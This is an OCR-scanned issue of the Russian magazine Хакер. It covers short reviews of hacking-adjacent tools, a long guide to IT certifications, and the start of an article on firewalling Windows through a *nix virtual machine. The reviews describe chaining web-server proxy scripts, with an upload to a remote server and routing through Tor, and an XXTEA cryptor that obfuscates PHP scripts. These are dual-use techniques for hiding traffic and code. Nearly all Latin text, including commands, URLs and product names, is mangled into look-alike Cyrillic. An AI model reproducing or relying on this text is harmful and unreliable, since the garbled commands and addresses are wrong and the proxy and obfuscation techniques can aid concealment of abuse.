новав экзешник в ѴѴіпІМоскег.ехе, и создаем к 
нейжеаиІюгип.іпВ 

[АикоКип] 

ІІзеАиЦоРІау=1 

зЬе11ехесике=МіпШі1оскег . ехе 
аскіоп=Запустить Ѵ7іпскжз ипіоскег 
аскіоп=ШіпШІоскег . ехе 
1аЪе1=Міпс1отлгз ипіоскег 
ісоп=МіпШі1оскег . ехе 
8Ье11\сшЬ1= Запустить ЭДіпскжз 
ипіоскег 

8Ье11\стЬ1\Соштапс1 = ЭДіпШіІоскег . ехе 



ПРОГРАММА: йіСНЕСКЕК 

ОС: ѴѴІЫ00ѴѴ5 2000/2003/ХР/ѴІ5ТА/7 

АВТОР: РР0ХѴ-ВА5Е.0Р0 

Очередной чекер проксей на страницах рубрики. 
Итак, ОіСЬескег — это многопоточный Зоскз 4/5 
и НТТР Ргоху-чекер, главная фишка которого 



заключается в выставлении таймаута для 
проверки. Чем меньше таймаут, тем шустрее 
проксик. 

Возможности чекера: 

• сохранение каждого типа проксей в свой файл 
после чека; 

• удаление дубликатов из списка; 

• удаление мусора из списка (по шаблонам); 

• опция смены И РЕ для чека (чек проксей под 
нужные ресурсы); 

• автосохранение настроек (потоки и таймаут); 

• удобный интерфейс. 

Все остальные подробности ищи на официаль- 
ном форуме создателей чекера ргоху-Ьазе.огд. 

ПРОГРАММА: РРКОХѴ 
ОС: ^ЫІХ/ѴѴІЫ 
АВТОР: В0Ы5 

Если перед тобой когда-либо вставала проблема 
поиска прокси-сервера, работающего не какде- 
мон или служба, а именно в контексте веб-сер- 
вера, то советую воспользоваться замечатель- 
ным набором скриптов под названием рргоху. 
Итак, рргоху состоит из двух частей: на удален- 
ный сервер заливается первая часть, написан- 
ная на РНР ( рргоху. рбр), а на локалхосте запуска- 
ется вторая часть проксика, реализованная на 
РегІ(рІосаЕрІ), которая и будет прослушивать 
порт как НТТР-прокси. 

Использовать прокси достаточно просто. Допус- 
тим, что рргоху.рбр находится по адресу ЬНр:// 
гііе.сот/ргохѵ/рргохѵ.рбр . то гда л о ка л ьн ы й 
скрипт будет за пускаться следующим образом 
(поумолчанию открывается порт 8008) : 

регі ріосаі.рі -рх ЬЦЦр: //зіке.сош/ 
ргоху /рргоху . рЬр 

Построить цепочку из проксей можнотак: име- 
ются два веб-сервера с двумя скриптами рргоху. 
рбр ( Ыір ://гі1е 1 .сот/ргоху/рргоху.рбр и Ыір :// 
5ІІе2.сот/ргохѵ/рргохѵ.рЬр ). тогда локальный 
скриптзапускается два раза со следующими 
параметрами: 

регі ріосаі.рі -рх ЪЬЬр: //зікеі.сош/ 
ргоху /рргоху . рЬр 
регі ріосаі .рі -рх ЪЬЬр : //зіке2 . 
сош/ргоху /рргоху . рЬр -Срх ЬССр:// 



ІосаІЬозД: 8008 -Ьр 8009 

Далее браузер настраивается на 8009 порт и 
трафик идет по цепочке Іосаібозі зііеі .сот 
5Йе2.сот ІагдеЕ 

Также возможно использование скриптов через 
Тог. 

Привожу пример с Тог+Ргіѵоху (поумолчанию 
порт 81 18): 

регі ріосаі .рі -рх ЪЬЬр: //зіЬе. 
сош/ргоху /рргоху . рЬр -Црх ЪЬЬр: // 
ІосаІЬозС : 8118 

Еще одна фича заключается втом, что проксик 
можно запаролить, установив свой пассворд в 
рргоху. рбр: 

$зесгек = 'рргохуразз'; 

и запустив ріосаі.рітак: 

регі ріосаі.рі -рх ЬССр : //зіке . сот/ 
ргоху/рргоху .рЬр -рѵ^Ь рргохуразз 

В комплекте с рргохутакже идет и альтерна- 
тивный клиент, написанный на ОеІрЫ/РазсаІс 
открытым исходным кодом. 

ПРОГРАММА: ХХТЕАСКѴРТОВ 
0С*МХ/ѴѴІМ 

АВТОР: 02А 

ХХіеа Сгуріог — это криптор рбр-скриптов, 
который можетзашифроватьлюбой рбр-скрипт 
алгоритмом ххІеа, а затем Ьазе64. 

ХХіеа — это расширение шифроалгоритма 
ХТЕА, которое было опубликовано в 1 998 году 
Дэвидом Вилером. Отличительной особен- 
ностью алгоритма является возможность 
шифровки блоков любого кратного 64 битам 
размера, в то время как другие алгорит- 
мы данного семейства используют блоки 
фиксированного размера, равного двум или 
четырем 32-битным числам (подробности 
ищи на Википедии ЫІрУ/ги.ѵѵікіресІіа.огд/ѵѵікі/ 
ХХТЕА ). 

Для использования скрипта просто выбери 
криптуемый файл, имя нового файла и ключ 
шифрования в соответствующих окнах, т 
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■ ■ Мария «Міігііі» Нефедова тагіа.пе^егіоѵагадіс.ги 




СЕРТИФИКАЦИЯ 
ТВОИХ НАВЫКОВ 

ГДЕ, КАК И ЗАЧЕМ ПОЛУЧАТЬ 
ВСЕ ЭТИ БУМАЖКИ 



ЗАЧЕМ ЭТО НУЖНО 

Пожалуй, эту статью стоит начать именно 
с вопроса «а на фига мне это надо?». Сер- 
тификация — дело сугубо добровольное, а 
все мы, как известно, ленивы... В итоге, как 
показывает практика, многие недооценива- 
ют пользу сертификатов, или вообще о ней 
не задумываются, полагая, что им хватит 
диплома о высшем образовании и\или хоро- 
шего послужного списка, то есть резюме. 

На деле это не совсем так, ведь если ты окончил 
тракторный институт, это еще не значит, что ты 
можешьуправлятьтрактором. Плюс ситуации 
в жизни бывают разные, так в ІТ-шной среде 
весьма велик процент гениальных самоучек, у 
которых зачастую вообще нет дипломов о вы- 
сшем образовании, или диплом есть, но совсем 
не профильный. И, конечно, не стоитзабывать 
об обратной стороне этой медали: множество 
людей с высшим ІТ-образованием едва могут 
переставить «Винду», и работодатели прекрас- 
но осведомлены об этом печальном факте. 

Итак, зачем вообще нужна сертификация? 
Давай начнем с наиболее сложного примера: 
допустим, у тебя уже имеется диплом о высшем 
образовании, равно как и неплохое резюме. 

Как это ни удивительно, в такой ситуации будет 
ошибочно полагать, что никакие сертификаты 
тебе не нужны. Совершенно непринципиально, 
собираешься литы устраиваться на работу, 



или уже имеешьтеплое местечко в хорошей 
компании, где и планируешь подниматься по 
карьерной лестнице семимильными шагами. В 
обоих случаях стоит помнить отом, что специ- 
алисты по работе с персоналом и начальство 
смотрятв первую очередь натвой опыти на 
конкретныезнания иумения. Наличиеже 
одного или нескольких взаимодополняющих 
сертификатов даеттебе дополнительные очки 
в их глазах, а также преимущество перед дру- 
гими соискателями — ты не просто «умеешь», 
ты подтвержденный и проверенный специа- 
лист (да-да, порой сертификат может являться 
неплохой заменой опыту работы, особенно для 
начинающего специалиста]. 

Практически аналогично дело обстоит и в слу- 
чае суже имеющейся должностью — у спеца с 
международными сертификатами куда больше 
шансов возглавить новый проект, принять 
участие в перспективном исследовании, или 
просто получить прибавку кзарплате. 

Чтобы утебя не создалось неверного впе- 
чатления, замечу, что сертификат, конечно, 
не палочка-выручалочка, которая распахнет 
перед тобой вседвери. Это лишь документ, 
подтверждающий твои профессиональные 
знания в определенных областях ІТ — и «в оп- 
ределенных областях» здесь ключевая фраза. 
Это немаловажный нюанс — нужно чувствовать 
грань разумного и понимать, что подход «а вот 
какой я крутой, у меня есть 1 5 разных бумажек!» 



— неверен в корне. Не стоит переводить качес- 
тво сертификатов в количество. Кчеловеку с 
пачкой сертификатов везде отнесутся с одина- 
ковой настороженностью, одни решат, что ты 
распыляешься, другие могут даже задуматься 

о подлинности этого множества документов. 
Словом, сертифицироваться тоже нужно с 
умом, но об этом речь пойдет ниже. 

Во многих случаях сертификация является 
не только подтверждением твоих знаний, но 
и способом повышения квалификации, что 
опять-таки совсем не лишнее даже для самых 
скиллованых профессионалов. 

«Стоять на месте» и никак не совершенс- 
твоваться, особенно втакой области как ІТ 

— верный способ карьерного самоубийства. 
Многие компании-гиганты, имеющие свои 
программы по сертификации специалистов 
(Огасіе, Місгозоіф Сізсо и т.д.) , отмечают, что в 
ходе подготовки ктестированию, большинство 
участников этих программ получают новые 
знания и приобретают полезный опыт. Кслову, 
на Западе найти высокооплачиваемую работу 
в крупной ІТ-компании, если ты не сертифици- 
рованный специалист, практически невоз- 
можно. 

В общем, как ни крути, плюсы от получения 
заветной бумажки налицо. Каковы минусы — 
спросишьты? Минусы есть, но они не слишком 
страшны — во-первых, сертификация стоит де- 
нег, и порядоксумм варьируется от несколько 



► 072 



ХАКЕР 05 /136/ 10 







)лѵ Влѵы. пишем 



Мау 29, 2007 



}оЬпаЛап Вііісе 

Ьсаппр іЬс тетпЬегсЬір Ш ЕСС920662 



ІІА5 ЯЮСЮѴЦШГ СОММ-ЕТЕО А1Х КЕЦІЛКкМКЧ Т5 лчо 
СКІТЕЯІА РОК ХАЮ СККПИСЛПОЧ ТНКОІЧПІ 
КХЛМІЧАПО.Ч АОМІМЫ І КН> КѴ ЕСЧХШЧС1І. 



ЕС-СоипсіІ 



С ЕН 

Сегііііссі ЕіЬісаІ Носкег 



сотен, до нескольких тысяч мертвых амери- 
канских президентов (учти, если ты завалишь 
тест на сертификат, деньги тебе не вернут]. 
Во-вторых, сертификаты имеютсвойство 
устаревать, все же ІТ-среда стремительно раз- 
вивается и меняется, так что сертификат 5-7 
летней давности не самый лучший аргумент в 



пользутвоих знаний. В-третьих, ксертифика- 
ции действительно нужно готовиться :]. 

В остальном, думаю, ты уже уловил мысль и 
смекнул, что если сертификация — полезный 
и выгодный козырь даже для крутых профи, то 
уж простым смертным от нее и вовсе случается 
обширный ргобТ В определенныхусловиях 



сертификаты могут фактически заменитьтебе 
диплом, а не дополнить его. 

Но, разумеется, обо всем этом стоитзадумы- 
ваться только в том случае, если ты ищешь в 
хорошооплачиваемую, интересную работу, с 
возможностью карьерного роста. 

А ГДЕ? 

Первое, что стоитуяснить, это какие бывают 
сертификаты: они делятся на обязательные, и 
необязательные. Первыетребуютсятам, где 
приходится работать с оборудованием несущим 
повышенную опасность для жизнедеятельности 
человека. Такие бумажки кнашей сегодняшней 
теме определенно не относятся, поэтому не будем 
на них задерживаться и перейдем к необязатель- 
ным сертификатам. 

Спектр необязательных се рти фи катов та к широк 
и разнообразен, что неподготовленного человека 
он может повергнуть в некоторый шок. Однако все 
совсем нетакстрашно, как кажется. 

Наиболее распространенная и вызывающая до- 
верие система сертификации на сегодня, это так 
называемая международная ІТ-сертификация — 
получение «корочек» от самой компании-вендора 
того или иного продукта. То есть, лидерами в этом 
области на протяжении уже многих летявляются 
сами компании-гиганты рынка —топовые произ- 
водители ПО, железа и та к дал ее (Місгозоіф Пеб 
ЬаТ НР, Сізсо, Огасіе и иже с ними]. 
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СЦЕНА 




РЕКЛАМНЫЕ БУКЛЕТЫ 0ТМ8. 



Уже чувствуешь, что становится понятнее? Да, 
ты догадываешься совершенно верно — серти- 
фицироваться стоит именно втой втой области, 
на которой ты сосредоточен, у конкретного 
вендора. Грубо говоря, если ты виндузятник — 
тебе в одну сторону, если линуксоид — в другую, 
а если дизайнер, таки вообще втретью. 

Не жди, что найдется возможность полу- 
чить сертификат некоего «универсального 
специалиста», ни одна серьезная компания 
ничего подобного не предоставит, а вот 
узкоспециализированные штуки вроде 5ип 
СегЕЕеб Оеѵеіорег Рог баѵа ѴѴеЬ Эегѵісез — 
это, пожалуйста. 

Также замечу, что онлайновые сертификаты 
всех мастей, которых сейчас существует 
безумное количество, в большинстве своем 
совершенно бесполезны, поэтому тратить 
время и деньги на эту глупость нецелесооб- 
разно. 

Относительно же крупных ІТ-шных вендоров 
стоит сказать и еще кое-что. Почти любой 
сертификат оттакой компании несете собой 
и маленькие, но приятные бонусы. Наиболее 
распространенные плюшки, это льготные цены 
на продукцию компании (а иногда даже бес- 
платные дистрибутивы или железки), доступ к 
закрытым разделам для «тру спецов», возмож- 
ность использовать лого компании-вендора на 
визитках и бланках, именные значки с твоим 
«званием», фирменные магнитики, ручки и 
другая чепуха. 

Конечно, перечислять все возможные направ- 
ления ІТ-шной деятельности, с их многочис- 
ленными нюансами и ответвлениями, мы не 
станем — нельзя объять необъятное. Вместо 
этого представляем тебе краткую сводку по 
топовым программам сертификации на сегод- 
няшний день. 

МІСК030РТ 

«Мелкомягкие» везде и всюду, так что с ними 
нужно считаться. Их сертификаты, во всяком 
случае, базовые, сравнительно недороги (пара 
сотен долларов) и котируются на рынке труда, 
являясьдовольно весомой бумагой. 

Система сертификации в МЭделится на следу- 
ющиеуровни: 

• специалисты потехнологии: программы 
сертификации, подтверждающие навыки ИТ 
профессионалов во внедрении, построении, 
устранении неполадок, и отладки конкретной 
технологии МісгозоЕ; 




СкгШорН Натіік 
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• профессионалы: программы сертификации, 
подтверждающие наличие специфичных для 
определенной должности навыков, выходящих 
за рамки знания технологии; 

• мастера: сертификация уровня «Мастер» 
подтверждает наличие у специалиста глубоких 
технических знаний конкретного продукта 
МісгозоЕ; 

• архитекторы: программа Сертифицирован- 
ный Архитектор помогает компаниям выявить 
опытных ИТ архитекторов, прошедших строгую 
процедуру отбора, проводимую наблюдатель- 
ным советом. 

Существуют также отдельные сертификаты для 
преподавателей. 

Каждая ветка сертификации позволяет вы- 
брать определенную специализацию, отаса 
по части Оббісе 2007 до мастера МісгозОТСЗСИ 
Эегѵег 2008 и так далее. 

С полным описанием программ сертификации, 
списками самих сертификатов и другой полез- 
ной инфой можно ознакомиться по адресу ууууу\л 
тісгозо^.сот/Риз/Кеагпіпа/МСР/Ре^аии.тзрх 

КЕБ НАТ 

Линуксоиды по части сертификатов тоже не 
обижены, и Веб Нар пожалуй, является лиде- 
ром в этой области. Программа сертификации 
от«Красных шапок» доступна в более чем 40 
странах мира, включая Россию. Эти ребята с 
радостью проверяттвои скиллы в области Неб 
На* Еп*егргізе І_іпих, Неб На* Ыпих и Ребога 
Соге, а потом выдадут соответствующую бумагу. 
В Неб На* можно стать обладателем следующих 
«титулов»: 

• РесІ На* Сег*і*іеб ТесЬпісіап (ВНСТ); 

• Веб На* Сег*і*іеб Епдіпеег (ВНСЕ); 

• Веб На* Сег*і*іса*ез о* Ехрег*ізе; 

• Веб На*Сег*і*іеб5есигі*у5ресіаІіз*(ВНС55); 

• Веб На* Сег*і*іеб 0а*асеп*ег5ресіа1із* 
(ВНСР5); 

• Веб На* Сег*і*іеб АгсЫ*ес* (ВНСА). 

Замечу, что сертификаты Неб На* хороши 
всем, кроме цены — зачастую счет здесь 
идет на приснопамятные тысячи долларов, 
это своего рода расплата за престижность 
бумажки и именитость Неб НаР Впрочем, 
высокими расценками, конечно, грешатне 
только «Красные шапки». 

За подробностями относительно программ 
сертификации отНеб Наі: сюда: ѵѵѵѵѵѵ.еи 
гебба*.сот/*гаіпіпд 




НАГЛЯДНАЯ ИНФОГРАФИКА 
ОТ «МЕЛ Г0МЯГКИХ». СТРУКТУРА 
ПРОГРАММ СЕРТИФИКАЦИИ МІСР050РТ. 



шшх 

РК0РЕ55ІІМІ. 
ІИЗТІТІІТЕ (ЬРІ) 

Еще одно удобство для линуксоидов — не- 
коммерческая международная общественная 
организация Еіпих Рго*еззіопа* Іпз*і*и*е (ЕРІ). 
Эти ребята сертифицируют системных адми- 
нистраторов ОЫЕІ/Еіпих и бЫЕІ/ипих-програм- 
мистов, без привязки к какому-либо конкрет- 
ному дистрибу, что без сомнения является 
большим плюсом. 

Градация программы выглядит следующим 
образом. Два уровня базовых курсов: 

І_РІСІ_еѵеИ 

Для получения нужно сдатьэкзамены: 

• Ю1:6епегаШпих1; 

• Ю2:6епегаШпих11. 

І_РІСІ_еѵеІ2 

Для получения нужно сдатьэкзамены: 

• 201: Абѵапсеб Абтіпіз*га*іоп; 

• 202: Ыпих 0 р*ітІ 2 а*іоп. 

И третий, продвинутый уровень: 

І_РІСІ_еѵе*з 

Для получения нужно сдатьэкзамены: 

• 32 і:ѴѴіпбоѵѵзІп*едга*іоп; 

• 322 : Іп*егпе* Зегѵег; 

• 323 : Оа*аЬазе Бегѵег; 

• 324: 5есигі*у, Рігеѵѵаііз, Епсгур*іоп; 

• 325: Кегпеі Іп*егпа1з & Оеѵісе бгіѵегз; 
Сгеа*іпд біз*гіЬи*іоп раскадез; 

• 32 х: Дополнительные экзамены по выбору. 
Все детали описаны на официальном сайте 
организации: ѵѵѵѵѵѵ.ірі.огд . 



СІЗСО 

Год за годом Сізсо 5уз*етз поставляет на 
мировой рынок почти 80% маршрутизаторов, 
что делает их одним из крупнейших игроков 
на рынке сетевого оборудования. Также за 
Сізсо уже давно закрепилосьзвание одного из 
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КУСОЧЕК ЛАБОРАТОРИИ КОМПАНИИ 
СІЗСО. 



лидеров в области сетевыхтехнологий, а их 
программа сертификации обширна и прове- 
рена временем. Как нетрудно догадаться, в 
Сізсо выдают«грамОты» сетевым специалис- 
там всех мастей. 

Какв Місгозоб: и ряде других компаний, здесь 
существует несколько уровней сертификации: 
ЕпТгу, Аззосіаіе, Ргоіеззіопаі, ЕхрегТ, а также 
отдельная сертификация БресіаІізЕ Наиболее 
престижным и дорогим среди них является 
сертификатССІЕ (ЕхрегТ). 

Далее идет деление по семи направлениям: 
Роибпд & ЗѵѵіТсЫпд, Оезідп, Ыеіѵѵогк Зесигку, 
Вегѵісе Ргоѵібег, Віогаде ІЧебл/огкіпд, Ѵоісе, и 
ѴѴігеІезз. 

Сертификации от Сізсо отличает редкая сте- 
пень зубодробильности, так что без серьезной 
подготовки (то есть, скорее всего — курсов] 
пройти их вряд ли получится. В итоге, дра- 
гоценная бумага можетобойтисьтебе в пару 
тысяч вечнозеленых денег. 

В дальнейшиехитросплетения и нюансы 
можно вникнуть здесь: ѵѵѵѵѵѵ.сізсо.соітѴѵѵеЬ/до/ 

^ сегббсабопз 

СОМРТІА (Сошриііпд 
ТесЬпоІоду Іпсіизігу 
Аззосіаііоп) 

Приятным исключением из нашего небольшого 
списка являются программы сертификации 
отСотрТІА. Дело в том, что в отличие от полка 
вендоров, это независимые ребята с 28-летней 
историей и мировым именем. 
СертифицируетСотрТІА по следующим 
направлениям: 

• СотрТІАА+ (сертификат общего характера, 
для начинающихІТ-спецов); 

• СотрТІА ІЧе*ѵѵогк+; 

• СотрТІА 5есигіІу+; 

• СотрТІА 5егѵег+; 

• СотрТІА І_іпих+; 

• СотрТІА РРІ+; 

• СотрТІА КРШ+; 

• СотрТІА Сопѵегдепсе+; 

• СотрТІА СТТ+; 

• СотрТІАСйІА+; 

• СотрТІА Ргоіеси. 

Интересно и то, что здесь позаботились не 
только о хардкорных гиках — в активе компании 
также имеются сертификат ІТ Рипсіаппепіаі.5, 
подтверждающий базовые знания компью- 




терных премудростей, сертификат для людей, 
работающих в области ІТ продаж — ІТ іюгВаІез, 
и даже сертификат Огееп ІТ, который жизненно 
необходим каждому гринписовцу. 
Официальный сайт: ѵѵѵѵѵѵ.соппрба.огс 

ОКАСЬЕ 

Совсем недавно Огасіе приобрел компанию 
5ип Місгозузіеппз.такчто здесьтеперь предо- 
ставляют целый ворох сертификатов — к собс- 
твенным программам Огасіе добавились, как 
минимум, сертификаты для баѵа специалистов. 
Сертификация же «Оракла» делится на 
следующиеуровни: Сегббеб Аззосіаіе, 

Сегббеб Ргоіеззіопаі, Сегббеб Мазіег, Вресіаі 
Ассгеббабоп, Сегббеб ЕхрегЕ Ргодгат и 
Сегббеб ВресіаІізТ 

Перечислять все «звания», которые можно 
получить, а также области, в которых выдаются 
сертификаты, не будем — слишком объемно, 
вместо этого лучше держи неудобную ссылку 
на официальные данные: ѵѵѵѵѵѵ.есіі 
огасІе.сот/рІз/ѵѵеЬ ргосІ-р[д-сІасІ/сІЬ радев. 
оеІраде?раде іб=39 

іс 

Отечественный 10 попал в этот список вовсе не 
по ошибке. Всеже, мыживем в России и далеко 
не каждый ІТ-ш ник непременно стремится най- 
ти работу за рубежом. Ау нас, какэто ни странно, 
1 С используется повсеместно, и спецы в этой 
области, вполне предсказуемо, востребованы. 
Ну и, разнообразия ради, этому списку не поме- 
шаетхотя бы один российский вендор :). 
Сертификат«1 С:Профессионал» будетявлять- 
ся официальным подтверждением того, что 
его владелец может эффективно использовать 
в своей работе весь спектр возможностей 
«1 С:Бухгалтерия». 

Сертификация на данный моментпрово- 
дится по системам «1 С:Предприятие 8» и 
«1 С: Предприятие 7.7». 

Официальная информация: ѵѵѵѵѵѵ. 1с. ги/ 
ргоШпп 




ОФИЦИАЛЬНЫЙ САЙТ ЕС-С01ЖИ. 
ЭТИЧНЫЕ ХАКЕРЫ СУРОВЫ, ДАЖЕ ЕСЛИ 
ОНИ ДЕВУШКИ. 



АООВЕ 

Выше я уже упомянула дизайнеров, так что этот 
пункт как раз для них и их коллег, если они нас 
ч и та ют. 

АбоЬе Вувіетз Іпсогрогаіеб, само собой, не 
могла остаться в стороне, когда другие крупные 
производители ПО один за другим открывали 
программы сертификации. 

В АбоЬе можно получить три сертификата: 
АбоЬе Сегббеб Ехрегі (АСЕ), АбоЬе Сегббеб 
Авзосіаіе (АСА) и АбоЬе СегббесІ Іпзігисіог 
(АСІ). 

АСЕ — это эксперт в области какого-то одного 
или нескольких продуктов АбоЬе, АСА — оце- 
нивает способности кандидатов в созда- 
нии, управлении и интеграции обычных и 
мультимедиа данных при использовании 
приложений Аб обе, ну а АСІ, понятное дело, 
сертификат для инструкторов и учителей. 
Официальный сайт: ѵѵѵѵѵѵ.абі 
сегбЕсабоп 



А КАК? 

Теперь, когда ты имеешь общее представ- 
ление о лучших программах сертификации, 
существующих на рынке, пришло время 
поговорить о том, какже стать гордым 
обладателем вышеописанных или других 
сертификатов. 

Какты понимаешь, 99% вендоров, это ком- 
пании западные и держать в России филиал, 
занимающийся сертификацией, подготовкой 
к ней и так далее, им, зачастую, неинтересно, 
невыгодно или не нужно. Однако отчаивать- 
ся и пугаться не стоит, у нас, тем не менее, 
имеется целый ряд мест, где можно пройти 
подготовку и сдать сами экзамены — авто- 
ризованные курсы и сертификацию все-таки 
никто не отменял. 

В вопросе поиска учебного центра или про- 
вайдера сертификационных услуг следует , 
быть предельно осторожным и бдительным 
— в последнее время в сети процветают 
десятки сомнительных ресурсов, которые 
с радостью попытаются всучить себе свой, 
«неимоверно крутой» сертификат, с которым 
можно разве что сходить в туалет, или умело 
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прикинуться официальными партнерами 
известных компаний. 

В свою очередь наиболее проверенными 
и зарекомендовавшими себя местами для 
прохождения сертификации и повышения 
квалификации у нас являются: 

• Центр компьютерного обучения «Специ- 
алист» при МГТУ им. Н.Э. Баумана: ѵѵѵѵѵѵ. 
зресіаІізЕги : 

• МГУ, при котором имеется «Учебный центр 
ВМК МГУ & ЗоКІіпе Аса бету»: ѵѵѵѵѵѵ. ІІ- 
ипіѵегзііѵ.ги . 

Не стоит забывать и провайдеров сертифи- 
кации мирового уровня, имеющих филиалы в 
разных странах, включая Россию. Например, 
ТЬотзоп Рготеігіс: .ѵѵѵѵѵ.рготеігіс.сот и ѴЦЕ: 
ѵѵѵѵѵѵ. ѵие. сот . 

Что касается подготовки к экзаменам, то 
каждый отдельный сертификат, в каждой 
области требует очень индивидуального 
подхода, поэтому советы общего характе- 
ра здесь вряд ли будут уместны. Сказать 
точно можно лишь одно — придется 
заниматься, готовиться, тратить на это 
время, деньги, штудировать литературу, и 
возможно, посещать курсы. Одним словом, 
«студенческие годы зітіке баск», по пол- 
ной программе. 






АЗ 

ііі 

гГі 






ш 

■уЦ 

$ 




ПРЕДСТАВИТЕЛЬ СОРМТІА ТЕРРИ ЭРДЛЕ РАССКАЗЫВАЕТ О НОВОЙ ПРОГРАММЕ 
СЕРТИФИКАЦИИ 



Вся подробная информация, касающаяся 
подготовки ктестам (в основном сертифи- 
кационные экзамены выполнены именно в 
виде тестов], их содержания и других важных 
мелочей, как правило, доступна на сайте са- 
мого вендора сертификата. Часто там можно 
встретить даже списки рекомендованной 
литературы. 

Также помни о том, что в инете есть всевозмож- 
ные симуляторы экзаменов, благодаря которым 
можно неплохо потренироваться перед сдачей, 
проверив свежеприобретенные знания. 

ДРУГИЕ ИНТЕРЕСНЫЕ 
СЕРТИФИКАТЫ 

Еслиты полагаешь, что уважающему себя 
ІТ’шнику нужны лишь сертификаты в области 
ІТ, ты не прав. Кпримеру, в качестве приятного 
бонуса к резюме неплохо будет получить также 
языковой сертификат, подтверждающий, что 
ты на достойном уровне владеешь кбким-либо 
иностранным языком. 



КАПИТАН ОЧЕВИДНОСТЬ ПРОСИЛ ПЕРЕДАТЬ, ЧТО ЗТО ЛОГО СОМРТІА 

сосСотрПА 



А+ СеПіре 6 

ІТ ТесНпісіап 



Если говорить об английском, то для этих 
целей неплохо подойдут, к примеру, ІЕБТЗ: 
ІпТегпаТіопаІ Епдіізб Бапдиаде ТезБпд 
Зу^Тепп, или популярный в России ТОЕЕБ: 

ТезТ оі Епдіізб аз а Еогеідп Бапдиаде. 

По поводу первого можно почитать здесь: 
ѵѵѵѵѵѵ. іеІЧз. о гд 

По поводу второго здесь: ѵѵѵѵѵѵ.іюей.огд 
Если позволяют возможности, ярким 
штрихом к резюме может послужить и ка- 
кой-то необычный, ноуважаемый на рынке 
сертификат. В качестве примера хорошо 
подойдет сертификат общества Мепза — 
крупнейшей и старейшей на нашей планете 
организации для людей с высоким коэф- 
фициентом интеллекта. «Менса» общество 
некоммерческое и открытое, но членство в 
нем дает возможность ощутить себя самой 
настоящей элитой — чтобы попасть туда, 
нужно под пристальным наблюдением 
комиссии, сдать Ютест лучше, чем 98% 
населения Земли. Задачка, конечно, не 
самая легкая, но более 1 00 тыс. человек с 
ней как-то справились :). 

Са йт орга низаци и: ѵѵѵѵѵѵ. тепза.огд ш 
Еще одна забавная и не совсем обычная на 
первый взгляд бумага — сертификат этичного 
хакера (СегббесІ ЕОпісаІ Наскег], придуман- 
ный Іпіегпабопаі Сои псі I об Е-Соттегсе 
СопзиОапГз (ЕС-СоипсіІ). Этичные хакеры 
ребята, в сущности своей добрые — по заказу 
компаний он и тестируют продукты на уязви- 
мости, стараясь взломать их и, таким образом, 
найти дырки и баги. 

Подробнееузнатьотом, какофициально стать 
добрым хакером можно здесь: ѵѵѵ 

огд/сегОбсабоп/сегОбесІ еіііісаі Ьаскег.азрх~іг 
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Бесплатно! ^)1 



Мобильные 

компьютеры 



ЭГПіРасІ 

>3 1 Л и СабВ нужно? 

1000 за 5М5 



Премьера рубрики «Зарабатываем» 

Самые ноутбучные 

Тест функциональных и недорогих лэптопов 



Г еймерский ноутбук 



Рццеры ГН Воок Е25Т/Е161, ІІ5В модем Усгіа, сумки и чехлы 6оИа. 
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Как обеспечить безопасность ѴѴіпсІоѵѵз при помощи 
*піх-системы, запущенной в виртуальной машине 

Большинство из нас привыкло кстандартным решениям, которые не 
пересматриваются годами. Такзащиту винды мы доверяем одному итому 
же комплекту программ — файрвол, антивирус, анти шпионская програм- 
ма... Подобный набор естьу каждого, отличаются лишь производители. 
Мы же попробуем другой путь — использовать в качестве блокпоста *піх- 
систему, запущенную в виртуальной машине. А насколько этот подход 
окажется эффективным в каждом конкретном случае, решать уже тебе. 



СУТЬ ИДЕИ 

Встроенные виндовые средства — ѴѴіпсІоѵѵз 
РігеѵѵаИ и ІпІегпеіСоппесІіопЗНагіпд (Общий 
доступ к интернету) достаточно неудобны, мало- 
функциональны и не обеспечивают должного 
уровня защиты. Поэтому, чтобы раздать интернет 
на несколько компов, с возможностью полноцен- 
ного контроля всего процесса, требуется либо хар- 
дварный роутер, либо одно из софтовых решений, 
вроде ІІзегОаІе Ргоху & Рігеѵѵаіі, ІЧеІѵѵогкЗЬіеІсІ 
Рігеѵѵаіі или КегіоѴѴіпРоиІе Рігеѵѵаіі. Роутер по- 
нятен в настройках, даже самые простые железки 
имеют минимальные функции фильтра пакетов, 
маршрутизации, защиты отатакитакдалее. Но 
часто его возможности не дают развернуться на 
полную, и руки связаны тем, что заложено в него 
производителем. Более функциональные реше- 
ния стоят соответственно, но и их возможностей 



может не хватать (например, шейпинга, учета 
трафика, мониторинга загрузки канала). Анало- 
гичная ситуация и ссофтовыми решениями. За 
хороший файрвол со всеми наворотами придется 
заплатить. Нестоитзабыватьотом, что защита 
работает, пока пользователь остается в домашней 
локальной сети, но стоит подключиться к инету 
через одну из многочисленныхточекдоступа за 
пределами дома, как мы оставляем компьютере 
ѴѴіпсІоѵѵз Рігеѵѵаіі, то есть практически беззащит- 
ным. 

Мощности современных настольных систем 
вполне достаточно, чтобы установить вир- 
туальную машину, которую и использовать в 
качестве файра для защиты локальной системы 
или шлюза для подключения других ком- 
пьютеров домашней сети. Кроме того, на нем 
можно развернуть прокси, кэширующий БЫЗ 



и прочие необходимые сервисы (например, 
ЮЗ.ѴРІМ или ІР-РВХ). Естественно, в целях 
экономии ресурсов в виртуальной машине не 
стоит за пускать десктоп ную ОС, вполне можно 
обойтисьсерверным дистрибутивом Біпих в 
минимальной инсталляции, или взять одну из 
ВЗБ систем. Например, ОрепВЗБ в дефолтовой 
установке прекрасно работает, если ей выделить 
всего 32-64 Мб ОЗУ и 300 Мб места на харде, что, 
согласись, совсем немного, особенноучитывая 
возможности этой операционки. 

В дальнейшем мы рассмотрим настройки РР в 
ОрепВЗБ и ірІаЫез в Біпих. В качестве виртуаль- 
ной машины будем использовать бесплатный 
ѴігІиаІВох ( ѵігІиаІЬох.ого ). который достаточно 
прост в настройках и нежаден до оперативки. 
Хотя прижелании его можнозаменитьОЕМО, 
Ѵігіиаі РС или другим решением. Еще вариант: 
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ѴігіиаІВох — популярный и бесплатный про- 
дукт виртуализации 



создать образ в ѴМѵѵагеЗегѵег (ключ выдается бесплатно), 
который затем задействовать в ѴМѵѵаге Ріауег. 

ВИНДОВЫЕ РАЗБОРКИ 

Чтобы исключить выход хостовой ОС в интернет, в 
настройках реального сетевого адаптера снимаем все 
флажки, за исключением ѴЫиаІВох ВгісІдесІ Ыеілл/огкіпд 
Огіѵег. В том числе нужно убрать поддержку «Протокол 
Интернета (ТС Р/І Р) » и «Клиент для сетей МісгозоД». В 
настройках виртуального сетевого интерфейса, появив- 
шегося после установки ѴіНиаІВох, в качестве шлюза 
по умолчанию и 0І\І5-сервера указываем ІР-адрес 
